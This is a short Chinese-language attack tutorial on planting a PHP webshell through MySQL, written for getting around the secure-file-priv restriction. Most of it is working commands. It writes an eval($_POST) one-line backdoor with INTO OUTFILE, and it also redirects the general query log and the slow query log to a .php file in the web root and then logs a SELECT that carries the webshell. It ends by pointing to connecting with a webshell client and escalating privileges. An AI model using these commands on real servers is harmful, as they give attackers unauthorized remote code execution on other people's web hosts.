前言:
此方法可以绕过–secure-file-priv 进行getshell.
查看 –secure-file-priv是否开启:
show global variables like '%secure%';securefile priv值为null,不能进行导出导入数据,不能读取(即使是root权限)
直接getshell
select '<?php @eval($_POST['maikefee']); ?>' INTO OUTFILE '网站目录/shell.php';利用日志getshell:
查看genera文件配置情况
show global variables like "%genera%";开启日志记录
set global general_log='on';日志文件导出指定目录
set global general_log_file='C:/phpstudy/WWW/shell.php';记录sql语句写马,在查询中执行 (没有安全狗,可直接传原马)
select '<?php @eval($_POST["wintrysec"]); ?>';关闭记录
set global general_log=off;
菜刀连接后如果是普通权限,接下来开始提权提权:
https://maikefee/archives/9ccf323f.html
第二种 慢查询日志来写shell
我们主要利用慢查询日志来写shell,步骤大致分为三步:
设置slow_query_log=1.即启用慢查询日志(默认禁用)。
set global slow_query_log=1;伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名
set global slow_query_log_file='dir\filename'向日志文件写入shell
select '<?php @eval($_POST["wintrysec"]); ?>';关闭慢查询:
set global slow_query_log=0;